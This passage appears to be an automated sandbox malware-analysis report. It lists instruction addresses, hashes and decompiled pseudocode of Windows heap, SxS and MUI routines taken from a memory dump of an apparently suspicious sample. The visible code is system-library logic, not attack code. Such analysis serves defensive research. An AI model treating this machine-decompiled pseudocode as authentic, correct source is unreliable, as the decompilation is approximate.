                                                        0x018a2eb1
                                                        0x018a2eb3
                                                        0x018a2eb8
                                                        0x018a2ebd
                                                        0x018a2ec4
                                                        0x018a2ed6
                                                        0x018a2ec6
                                                        0x018a2ec7
                                                        0x018a2ecc
                                                        0x018a2ecf
                                                        0x018a2ed2
                                                        0x018a2ed2
                                                        0x018a2ed9
                                                        0x018a2ed9
                                                        0x018a2ee8
                                                        0x018a2eeb
                                                        0x018a2eef
                                                        0x018a2ef2
                                                        0x018a2efe
                                                        0x018a2f04
                                                        0x018a2f04
                                                        0x018a2f04
                                                        0x018a2f06
                                                        0x018a2f0d
                                                        0x018a2f0f
                                                        0x018a2f13
                                                        0x018a2f13
                                                        0x018a2f1b
                                                        0x018a2f21
                                                        0x018a2f27
                                                        0x018a2f95
                                                        0x018a2f98
                                                        0x018a2f9b
                                                        0x018a2fa0
                                                        0x00000000
                                                        0x00000000
                                                        0x018a2fa6
                                                        0x018a2fa9
                                                        0x018a2fac
                                                        0x00000000
                                                        0x00000000
                                                        0x018a2fb2
                                                        0x018a2fb9
                                                        0x00000000
                                                        0x00000000
                                                        0x018a2fc3
                                                        0x018a2fca
                                                        0x00000000
                                                        0x00000000
                                                        0x018a2fd0
                                                        0x018a2fd6
                                                        0x018a2fd9
                                                        0x018a2ff8
                                                        0x018a2ffd
                                                        0x018a2fdb
                                                        0x018a2ff0
                                                        0x018a2ff5
                                                        0x018a300e
                                                        0x018a300f
                                                        0x018a301a
                                                        0x00000000
                                                        0x018a2f29
                                                        0x018a2f29
                                                        0x018a2f2c
                                                        0x018a2f4b
                                                        0x018a2f50
                                                        0x018a2f2e
                                                        0x018a2f43
                                                        0x018a2f48
                                                        0x018a2f56
                                                        0x018a2f64
                                                        0x018a2f6c
                                                        0x018a2f6c
                                                        0x018a2f72
                                                        0x018a2f76
                                                        0x018a2f7c
                                                        0x018a2f83
                                                        0x018a2f89
                                                        0x018a2f8a
                                                        0x018a2f8a
                                                        0x00000000
                                                        0x018a2f76
                                                        0x018a2f27
                                                        0x018a2e6d
                                                        0x018a2da6
                                                        0x018a2dab
                                                        0x018a2db3
                                                        0x018a2db9
                                                        0x018a30bc
                                                        0x018a30c1
                                                        0x018a30c1

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                        • API String ID: 0-1745908468
                                                        • Opcode ID: b12ff6a911709b910fc4cd8deb8101deafd270d59b40b0d1969bc1d0088b28c8
                                                        • Instruction ID: d27f1e3f6d45c8507294c3041cedc1a8d36054314c128dcd83852af747c260c1
                                                        • Opcode Fuzzy Hash: b12ff6a911709b910fc4cd8deb8101deafd270d59b40b0d1969bc1d0088b28c8
                                                        • Instruction Fuzzy Hash: F69100319016499FEB26DFACC494AADFFF2BF49714F98801DE546DB252C7329A81CB01
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0181CCC0 Relevance: 7.7, Strings: 6, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 74%
                                                        			E0181CCC0(intOrPtr _a4, intOrPtr* _a8, signed int* _a12) {
				signed int _v8;
				char _v540;
				signed int _v544;
				char _v556;
				signed int _v560;
				signed int _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				signed int _v576;
				char _v580;
				char _v584;
				char* _v588;
				signed int _v590;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				intOrPtr _v604;
				signed int _v608;
				signed int _v612;
				signed short _v616;
				intOrPtr _v620;
				signed int _v624;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t76;
				intOrPtr _t79;
				signed int _t82;
				intOrPtr _t84;
				intOrPtr* _t104;
				void* _t105;
				void* _t106;
				signed int _t109;
				void* _t112;
				intOrPtr _t113;
				void* _t119;
				signed int _t123;
				signed int* _t126;
				void* _t127;
				signed int _t131;
				signed int _t133;

				_t133 = (_t131 & 0xfffffff8) - 0x25c;
				_v8 =  *0x18dd360 ^ _t133;
				_t104 = _a8;
				_t126 = _a12;
				_t76 = _a4 - 1;
				if(_t76 == 0) {
					_v580 = 0x18;
					_push( &_v580);
					_v568 = 0x40;
					_push(8);
					_v600 = 0;
					_push( &_v600);
					_v576 = 0;
					_v572 = 0x17c13a8;
					_v564 = 0;
					_v560 = 0;
					_t79 = E01829600();
					_v620 = _t79;
					if(_t79 >= 0 || _t79 == 0xc0000034 || _t79 == 0xc0000189) {
						_t80 = _v600;
						 *(_t104 + 0x18) =  *(_t104 + 0x18) | 0xffffffff;
						 *((intOrPtr*)(_t104 + 8)) = _v600;
					} else {
						_push(_t79);
						_t80 = E01875720(0x33, 0, "SXS: Unable to open registry key %wZ Status = 0x%08lx\n", 0x17c13a8);
						 *((char*)(_t104 + 0x1c)) = 1;
						L36:
						_t133 = _t133 + 0x14;
						if(_t126 == 0) {
							L9:
							_pop(_t119);
							_pop(_t127);
							_pop(_t105);
							return E0182B640(_t80, _t105, _v8 ^ _t133, _t115, _t119, _t127);
						}
						_t80 = _v608;
						L38:
						 *_t126 = _t80;
					}
					goto L9;
				}
				_t82 = _t76 - 1;
				if(_t82 != 0) {
					_t80 = _t82;
					if(_t80 == 0 &&  *_t104 != _t80) {
						_push( *_t104);
						_t80 = E018295D0();
					}
					goto L9;
				}
				_t84 =  *((intOrPtr*)(_t104 + 4));
				if(_t84 != 0) {
					if(_t84 != 1) {
						_t109 =  *_t104;
						_t80 = _t84 + 0xfffffffe;
						_v608 = _t109;
						_v584 = 0;
						_v596 = _t80;
						if(_t109 == 0) {
							L30:
							 *((char*)(_t104 + 9)) = 1;
							goto L9;
						}
						_push( &_v584);
						_push(0x220);
						_t115 =  &_v556;
						_push( &_v556);
						_push(0);
						_push(_t80);
						_push(_t109);
						_t80 = E01829820();
						_v624 = _t80;
						if(_t80 >= 0) {
							_t80 = _v544;
							if(_t80 > 0xfffe) {
								L20:
								 *((char*)(_t104 + 8)) = 1;
								if(_t126 != 0) {
									 *_t126 = 0xc0000106;
								}
								goto L9;
							}
							_t115 =  &_v592;
							_v592 = _t80;
							_v590 = _t80;
							_v588 =  &_v540;
							_t80 = E01874A28(_v608,  &_v592, _t104 + 0xc);
							_v612 = _t80;
							if(_t80 >= 0) {
								goto L9;
							}
							_push(_t80);
							_t80 = E01875720(0x33, 0, "SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx\n",  &_v592);
							 *((char*)(_t104 + 8)) = 1;
							goto L36;
						}
						if(_t80 == 0x8000001a) {
							goto L30;
						}
						_push(_t80);
						_t80 = E01875720(0x33, 0, "SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx\n", _v596);
						_t133 = _t133 + 0x14;
						 *((char*)(_t104 + 8)) = 1;
						if(_t126 == 0) {
							goto L9;
						}
						_t80 = _v600;
						goto L38;
					}
					E0182BB40(_t106,  &_v608, E017FAAB0());
					_t115 = _v616 & 0x0000ffff;
					 *(_t104 + 0xc) = 0;
					_t27 = _t115 + 0x10; // 0x50
					_t80 = _t27;
					if(_t27 > ( *(_t104 + 0xe) & 0x0000ffff)) {
						L22:
						 *((char*)(_t104 + 8)) = 1;
						if(_t126 != 0) {
							 *_t126 = 0xc0000023;
						}
						goto L9;
					}
					E0182F3E0( *((intOrPtr*)(_t104 + 0x10)), _v604, _t115);
					_t133 = _t133 + 0xc;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t80 = _v608 + 0x10;
					L8:
					 *(_t104 + 0xc) = _t80;
					goto L9;
				}
				_t80 =  *( *[fs:0x30] + 0x10);
				_t123 =  *( *( *[fs:0x30] + 0x10) + 0x38) & 0x0000ffff;
				_v596 = _t123;
				_t9 = _t123 + 0x10; // 0x17f6177
				_t112 = _t9;
				if(_t112 > 0xfffe) {
					goto L20;
				}
				_t80 =  *(_t104 + 0xe) & 0x0000ffff;
				if(_t112 > ( *(_t104 + 0xe) & 0x0000ffff)) {
					goto L22;
				}
				_t113 =  *((intOrPtr*)( *( *[fs:0x30] + 0x10) + 0x3c));
				if(( *( *( *[fs:0x30] + 0x10) + 8) & 0x00000001) == 0) {
					_t113 = _t113 +  *( *[fs:0x30] + 0x10);
				}
				E0182F3E0( *((intOrPtr*)(_t104 + 0x10)), _t113, _t123);
				_t133 = _t133 + 0xc;
				_t115 = 1;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *(_t104 + 0xc) = _v596 + 0xe;
				if(E0181D268( *((intOrPtr*)(_t104 + 0x10)), 1) != 0) {
					goto L9;
				} else {
					_t80 = 0;
					goto L8;
				}
			}












































                                                        0x0181ccc8
                                                        0x0181ccd5
                                                        0x0181cce0
                                                        0x0181cce4
                                                        0x0181cce8
                                                        0x0181cceb
                                                        0x0181ce12
                                                        0x0181ce1a
                                                        0x0181ce1d
                                                        0x0181ce25
                                                        0x0181ce2b
                                                        0x0181ce2f
                                                        0x0181ce30
                                                        0x0181ce34
                                                        0x0181ce3c
                                                        0x0181ce40
                                                        0x0181ce44
                                                        0x0181ce49
                                                        0x0181ce4f
                                                        0x0181ce5c
                                                        0x0181ce60
                                                        0x0181ce64
                                                        0x0185ad96
                                                        0x0185ad96
                                                        0x0185ada4
                                                        0x0185ada9
                                                        0x0185adad
                                                        0x0185adad
                                                        0x0185adb2
                                                        0x0181cd88
                                                        0x0181cd8f
                                                        0x0181cd90
                                                        0x0181cd91
                                                        0x0181cd9c
                                                        0x0181cd9c
                                                        0x0185adb8
                                                        0x0185adbc
                                                        0x0185adbc
                                                        0x0185adbc
                                                        0x00000000
                                                        0x0181ce4f
                                                        0x0181ccf1
                                                        0x0181ccf4
                                                        0x0181cda0
                                                        0x0181cda3
                                                        0x0185ac7c
                                                        0x0185ac7e
                                                        0x0185ac7e
                                                        0x00000000
                                                        0x0181cda3
                                                        0x0181ccfa
                                                        0x0181ccff
                                                        0x0181cdb1
                                                        0x0185acc4
                                                        0x0185acc8
                                                        0x0185accb
                                                        0x0185accf
                                                        0x0185acd3
                                                        0x0185acd9
                                                        0x0185ad2b
                                                        0x0185ad2b
                                                        0x00000000
                                                        0x0185ad2b
                                                        0x0185acdf
                                                        0x0185ace0
                                                        0x0185ace5
                                                        0x0185ace9
                                                        0x0185acea
                                                        0x0185aceb
                                                        0x0185acec
                                                        0x0185aced
                                                        0x0185acf2
                                                        0x0185acf8
                                                        0x0185ad34
                                                        0x0185ad3d
                                                        0x0185ac88
                                                        0x0185ac88
                                                        0x0185ac8e
                                                        0x0185ac94
                                                        0x0185ac94
                                                        0x00000000
                                                        0x0185ac8e
                                                        0x0185ad47
                                                        0x0185ad4b
                                                        0x0185ad50
                                                        0x0185ad59
                                                        0x0185ad61
                                                        0x0185ad66
                                                        0x0185ad6c
                                                        0x00000000
                                                        0x00000000
                                                        0x0185ad72
                                                        0x0185ad80
                                                        0x0185ad85
                                                        0x00000000
                                                        0x0185ad85
                                                        0x0185acff
                                                        0x00000000
                                                        0x00000000
                                                        0x0185ad01
                                                        0x0185ad0e
                                                        0x0185ad13
                                                        0x0185ad16
                                                        0x0185ad1c
                                                        0x00000000
                                                        0x00000000
                                                        0x0185ad22
                                                        0x00000000
                                                        0x0185ad22
                                                        0x0181cdc2
                                                        0x0181cdc7
                                                        0x0181cdd2
                                                        0x0181cdd6
                                                        0x0181cdd6
                                                        0x0181cddb
                                                        0x0185ac9f
                                                        0x0185ac9f
                                                        0x0185aca5
                                                        0x0185acab
                                                        0x0185acab
                                                        0x00000000
                                                        0x0185aca5
                                                        0x0181cde9
                                                        0x0181cdfb
                                                        0x0181cdfe
                                                        0x0181cdff
                                                        0x0181ce00
                                                        0x0181ce01
                                                        0x0181ce06
                                                        0x0181cd84
                                                        0x0181cd84
                                                        0x00000000
                                                        0x0181cd84
                                                        0x0181cd0b
                                                        0x0181cd0e
                                                        0x0181cd12
                                                        0x0181cd16
                                                        0x0181cd16
                                                        0x0181cd1f
                                                        0x00000000
                                                        0x00000000
                                                        0x0181cd25
                                                        0x0181cd2b
                                                        0x00000000
                                                        0x00000000
                                                        0x0181cd3a
                                                        0x0181cd4a
                                                        0x0185acbc
                                                        0x0185acbc
                                                        0x0181cd56
                                                        0x0181cd66
                                                        0x0181cd6c
                                                        0x0181cd6e
                                                        0x0181cd6f
                                                        0x0181cd70
                                                        0x0181cd71
                                                        0x0181cd75
                                                        0x0181cd80
                                                        0x00000000
                                                        0x0181cd82
                                                        0x0181cd82
                                                        0x00000000
                                                        0x0181cd82

                                                        Strings
                                                        • @, xrefs: 0181CE1D
                                                        • \WinSxS\, xrefs: 0181CDF3
                                                        • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 0185AD9C
                                                        • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 0185AD78
                                                        • .Local\, xrefs: 0181CD61
                                                        • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 0185AD06
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                        • API String ID: 0-3926108909
                                                        • Opcode ID: de22bbe2a30c73e8d8aa9c25fbbc93f102978da1701d02a49aace71d85466ba4
                                                        • Instruction ID: ae98d17381089b374e1057f1f2b9ba526ddc386229acd5eac5a2779bf57183fa
                                                        • Opcode Fuzzy Hash: de22bbe2a30c73e8d8aa9c25fbbc93f102978da1701d02a49aace71d85466ba4
                                                        • Instruction Fuzzy Hash: 4381CCB25083429FD726DF29C880A2BBBE8EF85714F44895DFC85DB245D374DA44CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017F3D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 96%
                                                        			E017F3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E017F1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E017F1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E017F1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E017F1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E017F1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = E01804620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0182F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01831370(_t276, 0x17c4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0182BB40(0,  &_v68, _t170);
									if(L017F43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0182BB40(_t257,  &_v68, _t243);
								if(L017F43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01831370(_t278, 0x17c4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = E01804620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0182F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01831370(_v16, 0x17c4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0182BB40(_t262,  &_v68, _t244);
								if(L017F43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01831370(_t282, 0x17c4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0182BB40(_t262,  &_v68, _t201);
							if(L017F43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = E01804620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0182F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01831370(_t280, 0x17c4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0182BB40(_t267,  &_v68, _t245);
							if(L017F43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01831370(_t284, 0x17c4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0182BB40(_t267,  &_v68, _t224);
						if(L017F43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                        0x017f3d3c
                                                        0x017f3d42
                                                        0x017f3d44
                                                        0x017f3d46
                                                        0x017f3d49
                                                        0x017f3d4c
                                                        0x017f3d4f
                                                        0x017f3d52
                                                        0x017f3d55
                                                        0x017f3d58
                                                        0x017f3d5b
                                                        0x017f3d5f
                                                        0x017f3d61
                                                        0x017f3d66
                                                        0x01848213
                                                        0x01848218
                                                        0x017f4085
                                                        0x017f4088
                                                        0x017f408e
                                                        0x017f4094
                                                        0x017f409a
                                                        0x017f40a0
                                                        0x017f40a6
                                                        0x017f40a9
                                                        0x017f40af
                                                        0x017f40b6
                                                        0x017f40bd
                                                        0x017f40bd
                                                        0x017f3d83
                                                        0x0184821f
                                                        0x01848229
                                                        0x01848238
                                                        0x01848238
                                                        0x0184823d
                                                        0x0184823d
                                                        0x017f3da0
                                                        0x017f3daf
                                                        0x017f3db5
                                                        0x017f3dba
                                                        0x017f3dba
                                                        0x017f3dd4
                                                        0x017f3e94
                                                        0x017f3eab
                                                        0x017f3f6d
                                                        0x017f3f84
                                                        0x017f406b
                                                        0x017f406b
                                                        0x017f406e
                                                        0x017f406e
                                                        0x017f4070
                                                        0x017f4074
                                                        0x01848351
                                                        0x01848351
                                                        0x017f407a
                                                        0x017f407f
                                                        0x0184835d
                                                        0x01848370
                                                        0x01848377
                                                        0x01848379
                                                        0x0184837c
                                                        0x0184837c
                                                        0x0184835d
                                                        0x00000000
                                                        0x017f407f
                                                        0x017f3f8a
                                                        0x017f3f8d
                                                        0x017f3f90
                                                        0x017f3f95
                                                        0x0184830d
                                                        0x0184830f
                                                        0x017f3f9b
                                                        0x017f3fac
                                                        0x017f3fae
                                                        0x017f3fb1
                                                        0x017f3fb1
                                                        0x017f3fb6
                                                        0x01848317
                                                        0x0184831a
                                                        0x00000000
                                                        0x017f3fbc
                                                        0x017f3fc1
                                                        0x017f3fc9
                                                        0x017f3fd7
                                                        0x017f3fda
                                                        0x017f3fdd
                                                        0x017f4021
                                                        0x017f4021
                                                        0x017f4029
                                                        0x017f4030
                                                        0x017f4044
                                                        0x017f4046
                                                        0x017f4046
                                                        0x017f4044
                                                        0x017f4049
                                                        0x01848327
                                                        0x01848334
                                                        0x01848339
                                                        0x0184833c
                                                        0x017f404f
                                                        0x017f404f
                                                        0x017f404f
                                                        0x017f4051
                                                        0x017f4056
                                                        0x017f4063
                                                        0x017f4063
                                                        0x017f4068
                                                        0x00000000
                                                        0x017f4068
                                                        0x017f3fdf
                                                        0x017f3fe2
                                                        0x017f3fe4
                                                        0x017f3fe7
                                                        0x017f3fef
                                                        0x017f4003
                                                        0x017f4005
                                                        0x017f4005
                                                        0x017f400c
                                                        0x017f4013
                                                        0x017f4016
                                                        0x017f4017
                                                        0x017f401b
                                                        0x017f401e
                                                        0x00000000
                                                        0x017f401e
                                                        0x017f3fb6
                                                        0x017f3eb1
                                                        0x017f3eb4
                                                        0x017f3eb7
                                                        0x017f3ebc
                                                        0x018482a9
                                                        0x018482ab
                                                        0x017f3ec2
                                                        0x017f3ed3
                                                        0x017f3ed5
                                                        0x017f3ed8
                                                        0x017f3ed8
                                                        0x017f3edd
                                                        0x018482b3
                                                        0x018482b6
                                                        0x00000000
                                                        0x017f3ee3
                                                        0x017f3ee8
                                                        0x017f3eed
                                                        0x017f3ef0
                                                        0x017f3ef3
                                                        0x017f3f02
                                                        0x017f3f05
                                                        0x017f3f08
                                                        0x018482c0
                                                        0x018482c3
                                                        0x018482c5
                                                        0x018482c8
                                                        0x018482d0
                                                        0x018482e4
                                                        0x018482e6
                                                        0x018482e6
                                                        0x018482ed
                                                        0x018482f4
                                                        0x018482f7
                                                        0x018482f8
                                                        0x018482fc
                                                        0x018482ff
                                                        0x018482ff
                                                        0x017f3f0e
                                                        0x017f3f11
                                                        0x017f3f16
                                                        0x017f3f1d
                                                        0x017f3f31
                                                        0x01848307
                                                        0x01848307
                                                        0x017f3f31
                                                        0x017f3f39
                                                        0x017f3f48
                                                        0x017f3f4d
                                                        0x017f3f50
                                                        0x017f3f50
                                                        0x017f3f53
                                                        0x017f3f58
                                                        0x017f3f65
                                                        0x017f3f65
                                                        0x017f3f6a
                                                        0x00000000
                                                        0x017f3f6a
                                                        0x017f3edd
                                                        0x017f3dda
                                                        0x017f3ddd
                                                        0x017f3de0
                                                        0x017f3de5
                                                        0x01848245
                                                        0x017f3deb
                                                        0x017f3df7
                                                        0x017f3dfc
                                                        0x017f3dfe
                                                        0x017f3e01
                                                        0x017f3e01
                                                        0x017f3e06
                                                        0x0184824d
                                                        0x0184824f
                                                        0x01848254
                                                        0x00000000
                                                        0x017f3e0c
                                                        0x017f3e11
                                                        0x017f3e16
                                                        0x017f3e19
                                                        0x017f3e29
                                                        0x017f3e2c
                                                        0x017f3e2f
                                                        0x0184825c
                                                        0x0184825f
                                                        0x01848261
                                                        0x01848264
                                                        0x0184826c
                                                        0x01848280
                                                        0x01848282
                                                        0x01848282
                                                        0x01848289
                                                        0x01848290
                                                        0x01848293
                                                        0x01848294
                                                        0x01848298
                                                        0x0184829b
                                                        0x0184829b
                                                        0x017f3e35
                                                        0x017f3e38
                                                        0x017f3e3d
                                                        0x017f3e44
                                                        0x017f3e58
                                                        0x018482a3
                                                        0x018482a3
                                                        0x017f3e58
                                                        0x017f3e60
                                                        0x017f3e6f
                                                        0x017f3e74
                                                        0x017f3e77
                                                        0x017f3e77
                                                        0x017f3e7a
                                                        0x017f3e7f
                                                        0x017f3e8c
                                                        0x017f3e8c
                                                        0x017f3e91
                                                        0x00000000
                                                        0x017f3e91

                                                        Strings
                                                        • Kernel-MUI-Number-Allowed, xrefs: 017F3D8C
                                                        • Kernel-MUI-Language-Allowed, xrefs: 017F3DC0
                                                        • WindowsExcludedProcs, xrefs: 017F3D6F
                                                        • Kernel-MUI-Language-SKU, xrefs: 017F3F70
                                                        • Kernel-MUI-Language-Disallowed, xrefs: 017F3E97
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                        • API String ID: 0-258546922
                                                        • Opcode ID: 6fc135f3348c14852a968f773edd43a2996b5bc125cf2a676d358b1445b2ba3b
                                                        • Instruction ID: 247861711242383eb7c9a9646ddf94d7b05c8cf96b8d71290c911221d74cdeb4
                                                        • Opcode Fuzzy Hash: 6fc135f3348c14852a968f773edd43a2996b5bc125cf2a676d358b1445b2ba3b
                                                        • Instruction Fuzzy Hash: E6F10B72D01619EBCB12DF98C980AEFFBB9FF59750F15006AE605E7251E7349A01CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017E40E1 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 29%
                                                        			E017E40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E017EB150();
					} else {
						E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017EB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E017EB150(", passed to %s", _t29);
					}
					_push("\n");
					E017EB150();
